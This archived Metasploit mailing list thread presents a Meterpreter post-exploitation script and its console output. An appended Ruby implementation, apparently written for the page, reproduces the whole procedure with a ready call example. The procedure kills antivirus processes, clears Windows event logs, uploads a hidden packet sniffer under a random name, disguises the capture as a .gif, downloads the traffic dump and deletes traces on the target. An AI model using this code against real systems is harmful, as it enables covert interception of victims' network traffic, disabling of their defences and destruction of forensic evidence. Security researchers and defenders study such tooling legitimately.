Metasploit mailing list archives

Meterpreter tcpdump script


From: matteo.cantoni at gmail.com (Matteo Cantoni)
Date: Fri, 14 Nov 2008 01:29:45 +0100

New version with new options:

- binary and dump name setting (or random!)
- dump extension setting
- tcpdump options and filters
- antivirus killer

meterpreter > run tcpdump
[*] Killing Antivirus services on the target...
[*]  |_ Killing off zonealarm.exe...
[*] Clearing the all events logs!
[*] Uploading executable CVRKF.exe to target!
[*] Run %SystemDrive%\CVRKF.exe -i 2 -w %SystemDrive%\CQXYC.gif -s 0 not port 22
[*] Sniffing for 600 seconds!
[*] Killing off CVRKF.exe after 600 seconds (pid 1580)
[*] Downloading dump file CQXYC.gif...
[*] Removing CVRKF.exe and CQXYC.gif from target!
[*] Clearing the all events logs!
[*] Done!
meterpreter >

- http://www.nothink.org/metasploit/tcpdump.rb
- http://www.nothink.org/metasploit/tcpdump.zip (md5: bf3330ce04c5cd409f81ad09a301959c)


2008/11/12 Matteo Cantoni <matteo.cantoni at gmail.com>

Hi,

ok ok I know this is a simple meterpreter script, but it seems to work and I
wrote it while drinking some beers in a pub :)

1) clears all the event logs (if log_clear is 1)
2) uploads tcpdump.exe (compiled with the Packet Sniffer SDK, WinPcap is not
required) to the target with a random name
3) creates a dump file with a random name
4) kills the sniffer's process on the target
5) downloads the dump file from the target
6) removes the sniffer and the dump from the target
7) clears all the event logs (if log_clear is 1)

meterpreter > run tcpdump
[*] Clearing the all events logs!
[*] Uploading executable OROPJ.exe to target!
[*] Sniffing for 600 seconds! (interface 2, dump file ZZTCN.pcap)
[*] Killing off OROPJ.exe after 600 seconds (pid 744)
[*] Downloading dump file ZZTCN.pcap...
[*] Removing OROPJ.exe and ZZTCN.pcap!
[*] Clearing the all events logs!
[*] Done!
meterpreter >

You could also add some tcpdump filters, etc.

- http://www.nothink.org/metasploit/tcpdump.rb
- http://www.softpedia.com/get/Network-Tools/Network-Tools-Suites/PacketStuff-Network-Toolkit.shtml (tnx Thierry)

Matteo
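
The two messages above describe the same procedure (clear logs, upload a sniffer under a random name, run it with a snaplen and a BPF filter, kill it, fetch and remove the dump, clear logs again) plus the options added in the second version (chosen or random binary/dump names, dump extension, tcpdump options and filter, antivirus killer). The following is an added example written for this archive page, not Matteo's tcpdump.rb and not code from the Metasploit project. The pure helpers (name picking, argument building with filter validation) run anywhere; run_sniffer needs a live Meterpreter session, the `client` object a script receives. The stdapi calls used (fs.file.upload_file/download_file/rm/expand_path, sys.process.execute/kill/get_processes, sys.eventlog.open(...).clear), the default event log names and the 'zonealarm.exe' example process name are assumptions made for the example:

```ruby
# Added example (not the original tcpdump.rb): the moving parts of a
# Meterpreter sniffer script like the one discussed in the thread.
# Assumptions: stdapi API names as noted in the lead-in; nothing here is
# taken from the original script's source.

# Random upper-case name of the kind seen in the thread output (CVRKF, CQXYC).
def random_name(len = 5)
  Array.new(len) { ('A'..'Z').to_a.sample }.join
end

# Choose the uploaded binary name and the dump name; nil means "random".
# The dump extension can be disguised (the thread's second run used .gif).
def pick_names(bin_name: nil, dump_name: nil, dump_ext: 'pcap')
  bin  = (bin_name  || random_name) + '.exe'
  dump = (dump_name || random_name) + '.' + dump_ext.sub(/\A\./, '')
  [bin, dump]
end

# Build the sniffer's argument string: interface index, output file,
# snaplen (0 = full packets), then an optional BPF filter. The filter is
# appended to a command line, so only characters a BPF expression needs
# are accepted; anything else (quotes, ';', '&&', redirection) is refused.
def sniffer_args(iface:, dump:, snaplen: 0, filter: nil)
  raise ArgumentError, 'iface must be a positive integer' unless iface.is_a?(Integer) && iface > 0
  raise ArgumentError, 'snaplen must be >= 0' unless snaplen.is_a?(Integer) && snaplen >= 0
  args = "-i #{iface} -w #{dump} -s #{snaplen}"
  if filter && !filter.strip.empty?
    f = filter.strip
    raise ArgumentError, 'unsafe characters in filter' unless f =~ /\A[\w\s.\/\-()&|!]+\z/
    args << " #{f}"
  end
  args
end

# "Antivirus killer": kill every process whose image name is in `names`
# (case-insensitive). Assumed API: get_processes returns hashes with
# 'name' and 'pid'. Noisy and not always effective; shown because the
# thread's script does it, not as a recommendation.
def kill_processes(client, names)
  wanted = names.map(&:downcase)
  client.sys.process.get_processes.each do |p|
    next unless wanted.include?(p['name'].to_s.downcase)
    client.sys.process.kill(p['pid'])
  end
end

# Clear the named event logs. Assumed API: eventlog.open(name).clear.
def clear_event_logs(client, logs = %w[Application System Security])
  logs.each { |l| client.sys.eventlog.open(l).clear }
end

# The whole procedure from the thread, driven over a Meterpreter session.
# local_exe is the sniffer binary on the attacker side; returns the local
# dump file name.
def run_sniffer(client, local_exe:, iface: 1, seconds: 600, snaplen: 0,
                filter: nil, bin_name: nil, dump_name: nil, dump_ext: 'pcap',
                av_procs: ['zonealarm.exe'], log_clear: false)
  bin, dump = pick_names(bin_name: bin_name, dump_name: dump_name, dump_ext: dump_ext)
  drive = client.fs.file.expand_path('%SystemDrive%')
  rbin  = "#{drive}\\#{bin}"
  rdump = "#{drive}\\#{dump}"

  kill_processes(client, av_procs) unless av_procs.empty?
  clear_event_logs(client) if log_clear

  client.fs.file.upload_file(rbin, local_exe)
  args = sniffer_args(iface: iface, dump: rdump, snaplen: snaplen, filter: filter)
  sniffer = client.sys.process.execute(rbin, args, 'Hidden' => true)
  sleep(seconds)
  client.sys.process.kill(sniffer.pid)

  client.fs.file.download_file(dump, rdump)   # dump lands in the cwd
  [rbin, rdump].each { |f| client.fs.file.rm(f) }
  clear_event_logs(client) if log_clear
  dump
end
```

Inside a Meterpreter script this would be called as `run_sniffer(client, local_exe: '/path/to/tcpdump.exe', iface: 2, filter: 'not port 22', dump_ext: 'gif', log_clear: true)`. Two practical caveats: the `sleep` blocks the session for the whole capture window, and clearing the event logs is itself logged as a "log cleared" event on the target, so it hides the earlier activity only from someone who does not look for that event.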
